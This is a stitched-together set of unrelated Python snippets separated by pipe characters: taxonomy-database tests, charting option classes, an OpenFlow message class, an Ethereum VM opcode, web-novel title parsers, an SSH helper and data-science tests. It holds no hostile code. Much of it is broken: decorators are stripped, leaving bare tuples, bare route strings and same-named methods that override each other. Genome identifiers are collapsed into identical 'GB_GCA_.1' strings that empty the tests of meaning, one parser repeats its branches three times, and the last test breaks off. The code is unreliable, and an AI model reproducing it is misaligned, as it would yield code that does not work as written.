cryptofilum = tree['protA'].up
self.assertEqual(cryptofilum.props.get('taxid'), 's__Korarchaeum cryptofilum')
self.assertEqual(cryptofilum.props.get('sci_name'), 's__Korarchaeum cryptofilum')
self.assertEqual(cryptofilum.props.get('rank'), 'species')
self.assertEqual(cryptofilum.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum cryptofilum'])
sp = tree['protC']
self.assertEqual(sp.props.get('taxid'), 'GB_GCA_.1')
self.assertEqual(sp.props.get('sci_name'), 's__Korarchaeum sp')
self.assertEqual(sp.props.get('rank'), 'subspecies')
self.assertEqual(sp.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum sp', 'GB_GCA_.1'])
def test_gtdbquery(self):
gtdb = GTDBTaxa(dbfile=DATABASE_PATH)
out = gtdb.get_descendant_taxa('c__Thorarchaeia', intermediate_nodes=True)
self.assertEqual(set(out), set(['o__Thorarchaeales', 'f__Thorarchaeaceae', 'g__B65-G9', 's__B65-G9 sp', 'GB_GCA_.1', 'GB_GCA_.1', 'g__OWC5', 's__OWC5 sp', 'GB_GCA_.1', 's__OWC5 sp', 'GB_GCA_.1', 'g__SMTZ1-45', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 'g__SMTZ1-83', 's__SMTZ1-83 sp', 'GB_GCA_.1', 's__SMTZ1-83 sp', 'GB_GCA_.1', 's__SMTZ1-83 sp', 'GB_GCA_.1', 'g__MP8T-1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 'g__TEKIR-14', 's__TEKIR-14 sp', 'GB_GCA_.1', 'g__JACAEL01', 's__JACAEL01 sp', 'GB_GCA_.1', 'g__SHMX01', 's__SHMX01 sp', 'GB_GCA_.1', 'g__TEKIR-12S', 's__TEKIR-12S sp', 'GB_GCA_.1', 'g__WTCK01', 's__WTCK01 sp', 'GB_GCA_.1']))
out = gtdb.get_descendant_taxa('c__Thorarchaeia', intermediate_nodes=False)
self.assertEqual(set(out), set(['GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1']))
out = gtdb.get_descendant_taxa('c__Thorarchaeia', intermediate_nodes=False, rank_limit='species')
self.assertEqual(set(out), set(['s__MP8T-1 sp', 's__MP8T-1 sp', 's__MP8T-1 sp', 's__MP8T-1 sp', 's__MP8T-1 sp', 's__SMTZ1-83 sp', 's__SMTZ1-83 sp', 's__SMTZ1-83 sp', 's__TEKIR-14 sp', 's__SHMX01 sp', 's__OWC5 sp', 's__OWC5 sp', 's__JACAEL01 sp', 's__B65-G9 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__WTCK01 sp', 's__TEKIR-12S sp']))
def test_get_topology(self):
gtdb = GTDBTaxa(dbfile=DATABASE_PATH)
tree = gtdb.get_topology(['p__Huberarchaeota', 'o__Peptococcales', 'f__Korarchaeaceae', 's__Korarchaeum'], intermediate_nodes=True, collapse_subspecies=True, annotate=True)
self.assertEqual(sorted(tree.leaf_names()), ['f__Korarchaeaceae', 'o__Peptococcales', 'p__Huberarchaeota'])
def test_name_lineages(self):
gtdb = GTDBTaxa(dbfile=DATABASE_PATH)
out = gtdb.get_name_lineage(['RS_GCF_.1'])
self.assertEqual(out[0]['RS_GCF_.1'], ['root', 'd__Bacteria', 'p__Firmicutes_B', 'c__Moorellia', 'o__Moorellales', 'f__Moorellaceae', 'g__Moorella', 's__Moorella thermoacetica', 'RS_GCF_.1'])
out = gtdb.get_name_lineage(['o__Peptococcales'])
self.assertEqual(out[0]['o__Peptococcales'], ['root', 'd__Bacteria', 'p__Firmicutes_B', 'c__Peptococcia', 'o__Peptococcales']) |
class RegexField(CharField):
default_error_messages = {'invalid': _('This value does not match the required pattern.')}
def __init__(self, regex, **kwargs):
super().__init__(**kwargs)
validator = RegexValidator(regex, message=self.error_messages['invalid'])
self.validators.append(validator) |
def test_boolean_roundtrip():
schema = {'type': 'record', 'name': 'test_boolean_roundtrip', 'fields': [{'name': 'field', 'type': 'boolean'}]}
record = {'field': True}
assert (record == roundtrip(schema, record))
record = {'field': False}
assert (record == roundtrip(schema, record)) |
class OptionSeriesPackedbubbleTooltipDatetimelabelformats(Options):
def day(self):
return self._config_get('%A, %e %b %Y')
def day(self, text: str):
self._config(text, js_type=False)
def hour(self):
return self._config_get('%A, %e %b, %H:%M')
def hour(self, text: str):
self._config(text, js_type=False)
def millisecond(self):
return self._config_get('%A, %e %b, %H:%M:%S.%L')
def millisecond(self, text: str):
self._config(text, js_type=False)
def minute(self):
return self._config_get('%A, %e %b, %H:%M')
def minute(self, text: str):
self._config(text, js_type=False)
def month(self):
return self._config_get('%B %Y')
def month(self, text: str):
self._config(text, js_type=False)
def second(self):
return self._config_get('%A, %e %b, %H:%M:%S')
def second(self, text: str):
self._config(text, js_type=False)
def week(self):
return self._config_get('Week from %A, %e %b %Y')
def week(self, text: str):
self._config(text, js_type=False)
def year(self):
return self._config_get('%Y')
def year(self, text: str):
self._config(text, js_type=False) |
class bsn_gentable_bucket_stats_reply(bsn_stats_reply):
version = 4
type = 19
stats_type = 65535
experimenter = 6035143
subtype = 5
def __init__(self, xid=None, flags=None, entries=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (flags != None):
self.flags = flags
else:
self.flags = 0
if (entries != None):
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.stats_type))
packed.append(struct.pack('!H', self.flags))
packed.append(('\x00' * 4))
packed.append(struct.pack('!L', self.experimenter))
packed.append(struct.pack('!L', self.subtype))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = bsn_gentable_bucket_stats_reply()
_version = reader.read('!B')[0]
assert (_version == 4)
_type = reader.read('!B')[0]
assert (_type == 19)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_stats_type = reader.read('!H')[0]
assert (_stats_type == 65535)
obj.flags = reader.read('!H')[0]
reader.skip(4)
_experimenter = reader.read('!L')[0]
assert (_experimenter == 6035143)
_subtype = reader.read('!L')[0]
assert (_subtype == 5)
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.bsn_gentable_bucket_stats_entry.unpack)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.flags != other.flags):
return False
if (self.entries != other.entries):
return False
return True
def pretty_print(self, q):
q.text('bsn_gentable_bucket_stats_reply {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('flags = ')
value_name_map = {1: 'OFPSF_REPLY_MORE'}
q.text(util.pretty_flags(self.flags, value_name_map.values()))
q.text(',')
q.breakable()
q.text('entries = ')
q.pp(self.entries)
q.breakable()
q.text('}') |
def callcode(evm: Evm) -> None:
gas = Uint(pop(evm.stack))
code_address = to_address(pop(evm.stack))
value = pop(evm.stack)
memory_input_start_position = pop(evm.stack)
memory_input_size = pop(evm.stack)
memory_output_start_position = pop(evm.stack)
memory_output_size = pop(evm.stack)
to = evm.message.current_target
extend_memory = calculate_gas_extend_memory(evm.memory, [(memory_input_start_position, memory_input_size), (memory_output_start_position, memory_output_size)])
transfer_gas_cost = (Uint(0) if (value == 0) else GAS_CALL_VALUE)
message_call_gas = calculate_message_call_gas(value, gas, Uint(evm.gas_left), extend_memory.cost, (GAS_CALL + transfer_gas_cost))
charge_gas(evm, (message_call_gas.cost + extend_memory.cost))
evm.memory += (b'\x00' * extend_memory.expand_by)
sender_balance = get_account(evm.env.state, evm.message.current_target).balance
if (sender_balance < value):
push(evm.stack, U256(0))
evm.gas_left += message_call_gas.stipend
else:
generic_call(evm, message_call_gas.stipend, value, evm.message.current_target, to, code_address, True, memory_input_start_position, memory_input_size, memory_output_start_position, memory_output_size)
evm.pc += 1 |
class OptionPlotoptionsVennSonificationDefaultinstrumentoptionsMappingPlaydelay(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesBubbleDataMarkerStatesSelect(Options):
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def fillColor(self):
return self._config_get('#cccccc')
def fillColor(self, text: str):
self._config(text, js_type=False)
def lineColor(self):
return self._config_get('#000000')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(2)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(None)
def radius(self, num: float):
self._config(num, js_type=False) |
def extractOtterspaceTranslation(item):
(chp, vol, frag) = extractChapterVolFragment(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('Elqueeness' in item['title']):
return buildReleaseMessageWithType(item, 'Spirit King Elqueeness', vol, chp, frag=frag)
if (('[Dark Mage]' in item['title']) or ('[DarkMage]' in item['title'])):
return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
if ('Dragon Maken War' in item['title']):
return buildReleaseMessageWithType(item, 'Dragon Maken War', vol, chp, frag=frag)
if ('Legend of Legend' in item['title']):
return buildReleaseMessageWithType(item, 'Legend of Legend', vol, chp, frag=frag)
if (("Seoul Station's Necromancer" in item['title']) or ("Seoul Station's Necromancer" in item['tags'])):
return buildReleaseMessageWithType(item, "Seoul Station's Necromancer", vol, chp, frag=frag)
if ('Dark Mage' in item['tags']):
return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
if ('Limitless Dream' in item['tags']):
return buildReleaseMessageWithType(item, 'Limitless Dream', vol, chp, frag=frag)
if ('Link the Orc' in item['tags']):
return buildReleaseMessageWithType(item, 'Link the Orc', vol, chp, frag=frag)
if ('KON' in item['tags']):
return buildReleaseMessageWithType(item, 'King of the Night', vol, chp, frag=frag)
if ('EoSP' in item['tags']):
return buildReleaseMessageWithType(item, 'Emperor of Solo Play', vol, chp, frag=frag)
if ('Elqueeness' in item['title']):
return buildReleaseMessageWithType(item, 'Spirit King Elqueeness', vol, chp, frag=frag)
if (('[Dark Mage]' in item['title']) or ('[DarkMage]' in item['title'])):
return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
if ('Dragon Maken War' in item['title']):
return buildReleaseMessageWithType(item, 'Dragon Maken War', vol, chp, frag=frag)
if ('Legend of Legend' in item['title']):
return buildReleaseMessageWithType(item, 'Legend of Legend', vol, chp, frag=frag)
if (("Seoul Station's Necromancer" in item['title']) or ("Seoul Station's Necromancer" in item['tags'])):
return buildReleaseMessageWithType(item, "Seoul Station's Necromancer", vol, chp, frag=frag)
if ('Dark Mage' in item['tags']):
return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
if ('Elqueeness' in item['title']):
return buildReleaseMessageWithType(item, 'Spirit King Elqueeness', vol, chp, frag=frag)
if (('[Dark Mage]' in item['title']) or ('[DarkMage]' in item['title'])):
return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
if ('Dragon Maken War' in item['title']):
return buildReleaseMessageWithType(item, 'Dragon Maken War', vol, chp, frag=frag)
if ('Legend of Legend' in item['title']):
return buildReleaseMessageWithType(item, 'Legend of Legend', vol, chp, frag=frag)
if (("Seoul Station's Necromancer" in item['title']) or ("Seoul Station's Necromancer" in item['tags'])):
return buildReleaseMessageWithType(item, "Seoul Station's Necromancer", vol, chp, frag=frag)
if ('Dark Mage' in item['tags']):
return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
return False |
def test_hit_rate_value_judged_only():
current = pd.DataFrame(data=dict(user_id=['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], prediction=[1, 2, 3, 1, 2, 3, 1, 2, 3], target=[1, 0, 0, 0, 0, 0, 0, 0, 1]))
metric = HitRateKMetric(k=3, no_feedback_users=True)
report = Report(metrics=[metric])
column_mapping = ColumnMapping(recommendations_type=RecomType.RANK)
report.run(reference_data=None, current_data=current, column_mapping=column_mapping)
results = metric.get_result()
assert (len(results.current) == 3)
assert np.isclose(results.current[1], 0.3333333)
assert np.isclose(results.current[2], 0.3333333)
assert np.isclose(results.current[3], 0.6666666) |
def extractEclipsecourtBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def _run_ssh(ssh, cmd, pty=False):
(stdin, stdout, stderr) = ssh.exec_command(cmd, get_pty=pty)
stdout_str = stdout.read().decode()
stderr_str = stderr.read().decode()
if (stdout.channel.recv_exit_status() != 0):
raise Exception(stderr_str)
if ssh.raise_stderr:
if stderr_str:
raise Exception(stderr_str)
return stdout_str
return (stdout_str, stderr_str) |
def f_third_build(f_second_build):
ctx = f_second_build
source = os.path.join(os.environ['TEST_DATA_DIRECTORY'], 'build_results', 'fedora-30-x86_64', '-example', 'example-1.0.14-1.fc30.x86_64.rpm')
build = '-example'
ctx.builds.append(build)
for chroot in ctx.chroots:
chdir = os.path.join(ctx.empty_dir, chroot, build)
os.mkdir(chdir)
shutil.copy(source, chdir)
(yield ctx) |
def draw_tree(tree, conf, outfile):
try:
from ... import add_face_to_node, AttrFace, TextFace, TreeStyle, RectFace, CircleFace, random_color, SeqMotifFace
except ImportError as e:
print(e)
return
def ly_basic(node):
if node.is_leaf:
node.img_style['size'] = 0
else:
node.img_style['size'] = 0
node.img_style['shape'] = 'square'
if ((len(MIXED_RES) > 1) and hasattr(node, 'tree_seqtype')):
if (node.tree_seqtype == 'nt'):
node.img_style['bgcolor'] = '#CFE6CA'
ntF = TextFace('nt', fsize=6, fgcolor='#444', ftype='Helvetica')
add_face_to_node(ntF, node, 10, position='branch-bottom')
if ((len(NPR_TREES) > 1) and hasattr(node, 'tree_type')):
node.img_style['size'] = 4
node.img_style['fgcolor'] = 'steelblue'
node.img_style['hz_line_width'] = 1
node.img_style['vt_line_width'] = 1
def ly_leaf_names(node):
if node.is_leaf:
spF = TextFace(node.species, fsize=10, fgcolor='#444444', fstyle='italic', ftype='Helvetica')
add_face_to_node(spF, node, column=0, position='branch-right')
if hasattr(node, 'genename'):
geneF = TextFace((' (%s)' % node.genename), fsize=8, fgcolor='#777777', ftype='Helvetica')
add_face_to_node(geneF, node, column=1, position='branch-right')
def ly_supports(node):
if ((not node.is_leaf) and node.up):
supFace = TextFace(('%0.2g' % node.support), fsize=7, fgcolor='indianred')
add_face_to_node(supFace, node, column=0, position='branch-top')
def ly_tax_labels(node):
if node.is_leaf:
c = LABEL_START_COL
largest = 0
for tname in TRACKED_CLADES:
if (hasattr(node, 'named_lineage') and (tname in node.named_lineage)):
linF = TextFace(tname, fsize=10, fgcolor='white')
linF.margin_left = 3
linF.margin_right = 2
linF.background.color = lin2color[tname]
add_face_to_node(linF, node, c, position='aligned')
c += 1
for n in range(c, len(TRACKED_CLADES)):
add_face_to_node(TextFace('', fsize=10, fgcolor='slategrey'), node, c, position='aligned')
c += 1
def ly_full_alg(node):
pass
def ly_block_alg(node):
if node.is_leaf:
if ('sequence' in node.features):
seqFace = SeqMotifFace(node.sequence, [])
motifs = []
last_lt = None
for (c, lt) in enumerate(node.sequence):
if (lt != '-'):
if (last_lt is None):
last_lt = c
if ((c + 1) == len(node.sequence)):
(start, end) = (last_lt, c)
motifs.append([start, end, '()', 0, 12, 'slategrey', 'slategrey', None])
last_lt = None
elif (lt == '-'):
if (last_lt is not None):
(start, end) = (last_lt, (c - 1))
motifs.append([start, end, '()', 0, 12, 'grey', 'slategrey', None])
last_lt = None
seqFace = SeqMotifFace(node.sequence, motifs, gap_format='line', scale_factor=ALG_SCALE)
add_face_to_node(seqFace, node, ALG_START_COL, aligned=True)
TRACKED_CLADES = ['Eukaryota', 'Viridiplantae', 'Fungi', 'Alveolata', 'Metazoa', 'Stramenopiles', 'Rhodophyta', 'Amoebozoa', 'Crypthophyta', 'Bacteria', 'Alphaproteobacteria', 'Betaproteobacteria', 'Cyanobacteria', 'Gammaproteobacteria']
colors = random_color(num=len(TRACKED_CLADES), s=0.45)
lin2color = {ln: colors[i] for (i, ln) in enumerate(TRACKED_CLADES)}
NAME_FACE = AttrFace('name', fsize=10, fgcolor='#444444')
LABEL_START_COL = 10
ALG_START_COL = 40
ts = TreeStyle()
ts.draw_aligned_faces_as_table = False
ts.draw_guiding_lines = False
ts.show_leaf_name = False
ts.show_branch_support = False
ts.layout_fn = [ly_basic, ly_leaf_names, ly_supports, ly_tax_labels]
MIXED_RES = set()
MAX_SEQ_LEN = 0
NPR_TREES = []
for n in tree.traverse():
if hasattr(n, 'tree_seqtype'):
MIXED_RES.add(n.tree_seqtype)
if hasattr(n, 'tree_type'):
NPR_TREES.append(n.tree_type)
seq = getattr(n, 'sequence', '')
MAX_SEQ_LEN = max(len(seq), MAX_SEQ_LEN)
if MAX_SEQ_LEN:
ALG_SCALE = min(1, (1000.0 / MAX_SEQ_LEN))
ts.layout_fn.append(ly_block_alg)
if (len(NPR_TREES) > 1):
rF = RectFace(4, 4, 'steelblue', 'steelblue')
rF.margin_right = 10
rF.margin_left = 10
ts.legend.add_face(rF, 0)
ts.legend.add_face(TextFace(' NPR node'), 1)
ts.legend_position = 3
if (len(MIXED_RES) > 1):
rF = RectFace(20, 20, '#CFE6CA', '#CFE6CA')
rF.margin_right = 10
rF.margin_left = 10
ts.legend.add_face(rF, 0)
ts.legend.add_face(TextFace(' Nucleotide based alignment'), 1)
ts.legend_position = 3
try:
tree.set_species_naming_function(spname)
annotate_tree_with_ncbi(tree)
tree.set_outgroup(out)
tree.reverse_children()
except Exception:
pass
tree.render(outfile, tree_style=ts, w=170, units='mm', dpi=300)
tree.render((outfile + '.svg'), tree_style=ts, w=170, units='mm', dpi=300)
tree.render((outfile + '.pdf'), tree_style=ts, w=170, units='mm', dpi=300) |
(nopython=True, parallel=True)
def predict_numba(east, north, force_east, force_north, mindist, forces, result):
for i in numba.prange(east.size):
result[i] = 0
for j in range(forces.size):
green = greens_func_jit((east[i] - force_east[j]), (north[i] - force_north[j]), mindist)
result[i] += (green * forces[j])
return result |
class TestHighlightAutoTitleMap(util.MdCase):
extension = ['pymdownx.highlight', 'pymdownx.superfences']
extension_configs = {'pymdownx.highlight': {'auto_title': True, 'auto_title_map': {'Python Console Session': 'Python'}}}
def test_auto_tile_map(self):
self.check_markdown('\n ```pycon\n >>> import test\n ```\n ', '\n <div class="highlight"><span class="filename">Python</span><pre><span></span><code><span class="gp">>>> </span><span class="kn">import</span> <span class="nn">test</span>\n </code></pre></div>\n ', True) |
def get_data_entry(kind, name, default=None, merge=False):
PRIORITIES = {'user-settings': 5, 'plugins': 3, 'climetlab': 2, 'default': 1}
files = _load_yaml_files()
if (kind not in files):
if (default is not None):
return default
raise KeyError(("No collection named '%s'" % (kind,)))
if (name not in files[kind]):
if (default is not None):
return default
raise KeyError(("No object '%s' in collection named '%s' (%s)" % (name, kind, sorted(files[kind].keys()))))
choices = files[kind][name].choices()
assert (len(choices) != 0)
if (len(choices) == 1):
return list(choices.values())[0]
frame = inspect.currentframe()
caller = inspect.getouterframes(frame, 0)
def is_active(owner, entry):
if (owner in PRIORITIES):
return True
for c in caller:
if c.filename.startswith(entry.root):
return True
return False
if (default is not None):
choices['default'] = Entry(name='default', kind='default', root=None, path=None, data=default, owner='default')
choices = {k: v for (k, v) in choices.items() if is_active(k, v)}
selected = [v for (_, v) in sorted(choices.items(), key=(lambda x: PRIORITIES.get(x[0], PRIORITIES['plugins'])))]
if (not merge):
return selected[0]
data = merge_dicts(*[v.data for v in selected])
return Entry(name='merged', kind=kind, root=None, path=None, data=data, owner='merged') |
class OptionPlotoptionsHistogramSonification(Options):
def contextTracks(self) -> 'OptionPlotoptionsHistogramSonificationContexttracks':
return self._config_sub_data('contextTracks', OptionPlotoptionsHistogramSonificationContexttracks)
def defaultInstrumentOptions(self) -> 'OptionPlotoptionsHistogramSonificationDefaultinstrumentoptions':
return self._config_sub_data('defaultInstrumentOptions', OptionPlotoptionsHistogramSonificationDefaultinstrumentoptions)
def defaultSpeechOptions(self) -> 'OptionPlotoptionsHistogramSonificationDefaultspeechoptions':
return self._config_sub_data('defaultSpeechOptions', OptionPlotoptionsHistogramSonificationDefaultspeechoptions)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def pointGrouping(self) -> 'OptionPlotoptionsHistogramSonificationPointgrouping':
return self._config_sub_data('pointGrouping', OptionPlotoptionsHistogramSonificationPointgrouping)
def tracks(self) -> 'OptionPlotoptionsHistogramSonificationTracks':
return self._config_sub_data('tracks', OptionPlotoptionsHistogramSonificationTracks) |
def main() -> None:
current_version = get_current_version()
minimum_version = MINIMUM_VERSION
print(f'''current_version = {current_version!s}
minimum_version = {minimum_version!s}
''')
versions = get_public_versions(current_version, minimum_version)
if (not versions):
print('error: no versions found')
sys.exit(1)
versions_str = '\n '.join((str(v) for v in versions))
print(f'''discovered versions:
{versions_str}
''')
failures = check_versions(versions)
if failures:
print('Sorting failed in versions:')
for (version, exc) in failures:
print(f' {version}: {exc}')
sys.exit(1)
else:
print('success!') |
class TestXRIValidator(unittest.TestCase):
def setUp(self):
self.validator = validators.XRI
def test_creation_valid_params(self):
self.validator()
self.validator(True, 'i-name')
self.validator(True, 'i-number')
self.validator(False, 'i-name')
self.validator(False, 'i-number')
def test_creation_invalid_xri(self):
self.assertRaises(AssertionError, self.validator, True, 'i-something')
def test_valid_simple_individual_iname_without_type(self):
validator = self.validator(True, 'i-name')
self.assertRaises(Invalid, validator.to_python, 'Gustavo')
def test_valid_iname_with_schema(self):
validator = self.validator()
self.assertEqual(validator.to_python('xri://=Gustavo'), 'xri://=Gustavo')
def test_schema_is_added_if_asked(self):
validator = self.validator(True)
self.assertEqual(validator.to_python('=Gustavo'), 'xri://=Gustavo')
def test_schema_not_added_if_not_asked(self):
validator = self.validator()
self.assertEqual(validator.to_python('=Gustavo'), '=Gustavo')
def test_spaces_are_trimmed(self):
validator = self.validator()
self.assertEqual(validator.to_python(' =Gustavo '), '=Gustavo') |
class LabelImportResult():
def __init__(self, format: LabelImportFormat) -> None:
self.format = format
self.account_fingerprint: Optional[str] = None
self.transaction_labels: Dict[(bytes, str)] = {}
self.key_labels: Dict[(int, str)] = {}
self.unknown_labels: Dict[(str, str)] = {} |
('/pansearch/<cid>/<mstr>/<offset>')
def pansearch(cid, mstr, offset):
if ((not mstr) or (mstr == '0')):
mstr = keyboard()
if (not mstr):
return
data = getfilelistdata(cid, offset, '0', '0', searchstr=mstr)
if data['state']:
imagecount = 0
items = []
milkname = '115'
if (str(plugin.get_setting('genm3u8')) == 'true'):
items.append({'label': 'M3U8', 'path': plugin.url_for('m3u8', cid=cid, offset=offset, star='0', name=milkname)})
for item in data['data']:
listitem = getListItem(item, mstr)
if (listitem != None):
items.append(listitem)
if ('ms' in item):
imagecount += 1
if (data['count'] > (int(offset) + int(pageitem))):
items.append({'label': colorize_label('', 'next'), 'path': plugin.url_for('pansearch', cid=cid, mstr=mstr, offset=str((int(offset) + int(pageitem)))), 'thumbnail': xbmc.translatePath(os.path.join(IMAGES_PATH, 'nextpage.png'))})
if ((imagecount >= 10) and ((imagecount * 2) > len(items))):
comm.setViewCode = 'thumbnail'
return items
else:
notify(msg=(',:' + comm.ensure_text(data['error'])))
login()
return |
def test_new_variable_names(df_vartypes):
transformer = MathFeatures(variables=['Age', 'Marks'], func=['sum', 'mean'], new_variables_names=['sum_of_two_vars', 'mean_of_two_vars'])
X = transformer.fit_transform(df_vartypes)
ref = pd.DataFrame.from_dict({'Name': ['tom', 'nick', 'krish', 'jack'], 'City': ['London', 'Manchester', 'Liverpool', 'Bristol'], 'Age': [20, 21, 19, 18], 'Marks': [0.9, 0.8, 0.7, 0.6], 'dob': pd.date_range('2020-02-24', periods=4, freq='T'), 'sum_of_two_vars': [20.9, 21.8, 19.7, 18.6], 'mean_of_two_vars': [10.45, 10.9, 9.85, 9.3]})
pd.testing.assert_frame_equal(X, ref) |
def test_cpa_update_raises_exception_if_traces_or_data_have_improper_types():
ts = 1000
nw = 8
d = scared.CPADistinguisher()
with pytest.raises(TypeError):
d.update(traces='foo', data=np.random.randint(0, 1, (ts, nw), dtype='uint8'))
with pytest.raises(TypeError):
d.update(data='foo', traces=np.random.randint(0, 1, (ts, nw), dtype='uint8')) |
def klippa_resume_parser(original_response: dict) -> ResumeParserDataClass:
response_data = original_response.get('data', {}).get('parsed', {})
applicant = response_data['applicant']
name = ResumePersonalName(raw_name=extract(applicant, ['name', 'value']), first_name=None, last_name=None, middle=None, title=None, prefix=None, sufix=None)
address = ResumeLocation(formatted_location=None, postal_code=None, region=None, country=extract(applicant, ['address', 'country', 'value']), country_code=None, raw_input_location=None, street=None, street_number=None, appartment_number=None, city=extract(applicant, ['address', 'city', 'value']))
phones = extract(applicant, ['phone_number', 'value'])
mails = extract(applicant, ['email_address', 'value'])
urls = [website['value'] for website in extract(applicant, ['websites'], []) if website.get('value')]
personal_infos = ResumePersonalInfo(name=name, address=address, self_summary=None, objective=None, date_of_birth=None, place_of_birth=None, phones=([phones] if phones else []), mails=([mails] if mails else []), urls=urls, fax=[], current_profession=None, gender=None, nationality=None, martial_status=None, current_salary=None)
education_entries = []
for edu in response_data.get('education', []):
education_address = ResumeLocation(formatted_location=None, postal_code=None, region=None, country=extract(edu, ['address', 'country', 'value']), country_code=None, raw_input_location=None, street=None, street_number=None, appartment_number=None, city=extract(edu, ['address', 'city', 'value']))
education_entries.append(ResumeEducationEntry(title=extract(edu, ['program', 'value']), start_date=extract(edu, ['start', 'value']), end_date=extract(edu, ['end', 'value']), location=education_address, establishment=extract(edu, ['institution', 'value']), description=extract(edu, ['program', 'value']), gpa=None, accreditation=None))
education = ResumeEducation(total_years_education=None, entries=education_entries)
work_experience_entries = []
for work in response_data.get('work_experience', []):
work_address = ResumeLocation(formatted_location=None, postal_code=None, region=None, country=extract(work, ['address', 'country', 'value']), country_code=None, raw_input_location=None, street=None, street_number=None, appartment_number=None, city=extract(work, ['address', 'city', 'value']))
work_experience_entries.append(ResumeWorkExpEntry(title=extract(work, ['job_title', 'value']), start_date=extract(work, ['start', 'value']), end_date=extract(work, ['end', 'value']), company=extract(work, ['company_name', 'value']), location=work_address, description=None, industry=None))
work_experience = ResumeWorkExp(total_years_experience=None, entries=work_experience_entries)
interests = []
for interest in response_data.get('other_interests', []):
interests.append(ResumeSkill(name=interest.get('value'), type=None))
extracted_data = ResumeExtractedData(personal_infos=personal_infos, education=education, work_experience=work_experience, languages=[], skills=[], certifications=[], courses=[], publications=[], interests=interests)
return ResumeParserDataClass(extracted_data=extracted_data) |
class CollectionIndexer():
def __init__(self, parent: GraphicCollection, selection: List[Graphic]):
self._parent = weakref.proxy(parent)
self._selection = selection
for attr_name in self._parent.graphics[0].__dict__.keys():
attr = getattr(self._parent.graphics[0], attr_name)
if isinstance(attr, GraphicFeature):
collection_feature = CollectionFeature(self._selection, feature=attr_name)
collection_feature.__doc__ = f'indexable <{attr_name}> feature for collection'
setattr(self, attr_name, collection_feature)
def graphics(self) -> np.ndarray[Graphic]:
return tuple(self._selection)
def __setattr__(self, key, value):
if hasattr(self, key):
attr = getattr(self, key)
if isinstance(attr, CollectionFeature):
attr._set(value)
return
super().__setattr__(key, value)
def __len__(self):
return len(self._selection)
def __repr__(self):
return f'''{self.__class__.__name__} {hex(id(self))}
Selection of <{len(self._selection)}> {self._selection[0].__class__.__name__}''' |
def test_daily_log_returns():
orig = [[0., 0., 0., 0.], [0., 0., 0., 0.]]
l1 = np.array(range(1, 6)).astype(np.float64)
l2 = [((10 * 0.2) + (i * 0.25)) for i in range(1, 6)]
d = {'1': l1, '2': l2}
df = pd.DataFrame(d)
